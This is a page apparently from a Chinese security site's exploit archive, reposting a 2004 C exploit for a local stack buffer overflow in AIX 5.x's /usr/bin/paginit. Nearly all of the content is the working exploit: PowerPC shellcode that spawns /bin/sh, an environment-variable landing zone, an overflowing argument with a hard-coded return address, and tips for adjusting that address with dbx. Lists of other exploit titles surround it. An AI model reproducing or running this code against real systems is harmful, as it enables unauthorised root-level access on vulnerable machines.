首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AIX 5.3/5.2/5.1 "paginit" local stack overflow Exploit
来源:vfocus.net 作者:vfocus 发布时间:2004-12-21  

AIX 5.3/5.2/5.1 "paginit" local stack overflow Exploit

/* exploit for /usr/bin/paginit
tested on: AIX 5.2

if the exploit fails it's because the shellcode
ends up at a different address. use dbx to check,
and change RETADDR accordingly.

cees-bart <ceesb cs ru nl>
*/

#define RETADDR 0x2ff22c90

char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

void printint(char* buf, int x) {
buf[0] = x >> 24;
buf[1] = (x >> 16) & 0xff;
buf[2] = (x >> 8) & 0xff;
buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
char *env[3];
char code[1000];
char buf[8000];
char *p, *i;
int offset1 = 0;

offset1 = 0; // atoi(argv[1]);

memset(code, 'C', sizeof(code));
memcpy(code, envlabel,sizeof(envlabel)-1);
// landingzone
for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
printint(i, 0x7ca52a79);

memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
code[sizeof(code)-1] = 0;

env[0] = code;
env[1] = 0;

memset(buf, 'A', sizeof(buf));
buf[sizeof(buf)-1] = 0;

p = buf;
p += 4114;
printint(p,RETADDR); // try to hit the landingzone
p += 72;
printint(p, RETADDR); // any readable address (apparently not overwritten)

execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ultrix 4.5/MIPS dxterm Local B
·Santy.A - phpBB <= 2.0.10 W
·Linux Kernel <= 2.6.9, <
·Webmin Remote BruteForce and C
·Linux Kernel <= 2.6.9, <
·Snort <= 2.2.10 Remote Deni
·phpBB 2.x and PHP 4.3.9 unseri
·Php Safe_mode Bypass Proof of
·WinRAR <= 3.41 Compressed F
·AIX 5.1 to 5.3 lsmcode Local R
·Ability FTPd v2.34 Remote Comm
·Internet Explorer and MSN Mess
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved